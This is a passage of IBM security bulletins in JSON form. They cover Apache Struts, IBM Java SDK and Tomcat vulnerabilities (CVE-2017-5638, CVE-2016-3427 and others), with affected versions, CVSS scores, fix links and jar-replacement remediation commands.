/opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib/ # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pmcadmin stop # pmcadmin start # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pmcadmin stop # pmcadmin start \n \n \nIf providing a mitigation add this line to this section: \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:33", "type": "ibm", "title": "Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:33", "id": "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "href": "https://www.ibm.com/support/pages/node/630909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Products and Versions of FlashSystem V840\u2019s two node types \n** \n_Storage Node_ \n\u00b7 Machine Type Models (MTMs) affected include 9846-AE1 and 9848-AE1 \n\u00b7 Code versions affected include supported VRMFs: \no 1.4.0.0 \u2013 1.4.6.0 \no 1.3.0.0 \u2013 1.3.0.7 \n \n_Controller Node _ \n\u00b7 MTMs affected include 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n\u00b7 Code versions affected include supported VRMFs: \no 7.8.0.0 \u2013 7.8.0.2 \no 7.7.0.0 \u2013 7.7.1.5\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 &amp; \n9848-AE1 \n \n**Controller nodes:** \n9846-AC0, \n9846-AC1, \n9848-AC0, &amp; \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF __ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_ \n \n__Controller Node VRMF __ \n_7.8 stream: 7.8.1.0_ \n_7.7 stream: 7.7.1.6_| _ __N/A_| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:32:46", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:32:46", "id": "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "href": "https://www.ibm.com/support/pages/node/697157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:47", "description": "## Summary\n\nJazz Team Server is shipped as a component of Jazz Reporting Service (JRS). Information about a security vulnerabilities affecting Jazz Team Server and Jazz-based products has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [Security Bulletin: Vulnerability in IBM\u00ae Java SDK affects multiple IBM Rational products based on IBM Jazz technology (CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21983782>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nJRS 5.0, 5.0.1, and 5.0.2| Jazz Foundation 5.0, 5.0.1, 5.0.2 \nJRS 6.0, 6.0.1, and 6.0.2| Jazz Foundation 6.0, 6.0.1, 6.0.2 \n* Both JRS and Jazz Foundation are part of Rational Collaborative Lifecycle Management. \n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T05:13:33", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-17T05:13:33", "id": "AAA4733E548388B933C5FBCDCA4EFEA642E359C79EA119CE1225DE33E6D4A575", "href": "https://www.ibm.com/support/pages/node/279261", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:15", "description": "## Summary\n\nThere is a vulnerability in IBM SDK Java\u2122 Technology Edition that is used by IBM Integration Designer and WebSphere Integration Developer. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nThis vulnerability affects IBM Integration Designer and WebSphere Integration Developer.\n\n## Remediation/Fixes\n\nTo fully mitigate these vulnerabilities, an additional fix (JR55856) is required for the following product versions: \n\n\n * [WebSphere Integration Developer V7.0.0.x](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Integration+Developer&fixids=7.0.0.5-WS-IID-IFJR55856>)\n * [IBM Integration Designer V7.5.1.2](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=7.5.1.2-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.0.1.3](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.0.1.3-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.0.1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.0.1-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.5.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.5.0-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.6.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.6.0-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.7.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.7.0-WS-IID-IFJR55856>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM Java\u2122 SDK affects IBM Integration Designer and WebSphere Integration Developer (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "4733D43646C8A9049B8454CA406366CE2D5051464AA128020F19F4299F6FC6E4", "href": "https://www.ibm.com/support/pages/node/278837", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:49", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Version 6 that is used by IBM Cognos Planning. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Cognos Planning 10.1 \n\nIBM Cognos Planning 10.1.1\n\n## Remediation/Fixes\n\nPlease apply fixes available at: \n\n[IBM Cognos Planning 10.1.1.7 Interim Fix 2](<http://www-01.ibm.com/support/docview.wss?uid=swg24042537>)\n\n \n[IBM Cognos Planning 10.1.0 Interim Fix 8](<http://www-01.ibm.com/support/docview.wss?uid=swg24042593>)\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:42:09", "type": "ibm", "title": "Security Bulletin: A security vulnerability in IBM Java Runtime affects IBM Cognos Planning (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T22:42:09", "id": "9CD14117A91708D3923BD78C3B0E27E442D14B8976544CB69E7166B29DBCC7C9", "href": "https://www.ibm.com/support/pages/node/540471", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:28", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae Runtime Environment Java\u2122 Versions 6 and 7 that are used by IBM Cognos Metrics Manager. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\n * * IBM Cognos Metrics Manager 10.2.2\n * IBM Cognos Metrics Manager 10.2.1\n * IBM Cognos Metrics Manager 10.2\n * IBM Cognos Metrics Manager 10.1.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix as soon as practical. As the fix is in a shared component across the Business Intelligence portfolio, applying the BI Interim Fix will resolve the issue. Note that the prerequisites named in the links are also satisfied by an IBM Cognos Metrics Manager install of the same version. \n\n\n \n[IBM Cognos Business Intelligence 10.1.1 Interim Fixes](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>) \n[IBM Cognos Business Intelligence 10.2.x Interim Fixes](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T23:16:10", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Cognos Metrics Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T23:16:10", "id": "A801B8C1EF0F6A4D59E8093D234C394269007D65A6E868D0FD1895AE417608B1", "href": "https://www.ibm.com/support/pages/node/282457", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:42", "description": "## Summary\n\nThere are vulnerabilities in IBM\u00ae Runtime Environments Java\u2122 Technology Edition, Versions 6 and 7, that is used by IBM Cognos Controller. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.2.1 \n\nIBM Cognos Controller 10.2\n\nIBM Cognos Controller 10.1.1\n\nIBM Cognos Controller 10.1\n\n## Remediation/Fixes\n\n[IBM Cognos Controller 10.2.1 FP4 IF2](<http://www-01.ibm.com/support/docview.wss?uid=swg24042409>)\n\n[IBM Cognos Controller 10.2 FP1 IF6](<http://www-01.ibm.com/support/docview.wss?uid=swg24042408>)\n\n[IBM Cognos Controller 10.1.1 FP3 IF6](<http://www-01.ibm.com/support/docview.wss?uid=swg24042410>)\n\n \n \n_Users of IBM Cognos Controller v10.1 are advised to contact IBM Customer Support._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:44:22", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in IBM Java Runtime affect IBM Cognos Controller (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T22:44:22", "id": "75C8D2E2467315AEBB99E354E2DB2EE058EBC8CD1C3ACE162A19DF807E6B2876", "href": "https://www.ibm.com/support/pages/node/278963", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:40", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae SDK Java\u2122 Technology Edition, Version 6 that is used by Rational Reporting for Development Intelligence (RRDI). The issue was disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRRDI 2.0, 2.0.1, 2.0.3 and 2.0.4| Cognos BI 10.1.1 \nRRDI 2.0.5 and 2.0.6| Cognos BI 10.2.1 \nRRDI 5.0, 5.0.1 and 5.0.2| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of RRDI. \n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0, 2.0.0.1, 2.0.1, 2.0.3 and 2.0.4** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 19 (Implemented by file 10.1.6306.509)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>). \nReview technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0.5 and 2.0.6 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 17 (Implemented by file 10.2.5000.528)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n**RRDI 5.0 and 5.0.1 and 5.0.2 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: A security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21983302>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 16 (Implemented by file 10.2.5010.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T05:13:33", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java SDK affects Rational Reporting for Development Intelligence (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-17T05:13:33", "id": "9A135CF5F1DD70B64FF2E55C6A7E52F7C3A64DEEFDD86F45910661C5A67617D8", "href": "https://www.ibm.com/support/pages/node/279263", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:35", "description": "## Summary\n\nThe Rational Reporting for Development Intelligence (RRDI) is shipped with a version of the Apache Tomcat web server which contains security vulnerabilities that could have a potential security impact.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRRDI 2.0, 2.0.1, 2.0.3 and 2.0.4| Cognos BI 10.1.1 \nRRDI 2.0.5 and 2.0.6| Cognos BI 10.2.1 \nRRDI 5.0, 5.0.1 and 5.0.2| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of RRDI. \n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0, 2.0.0.1, 2.0.1, 2.0.3 and 2.0.4** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 21 (Implemented by file 10.1.6306.520)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043287>). \nReview technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 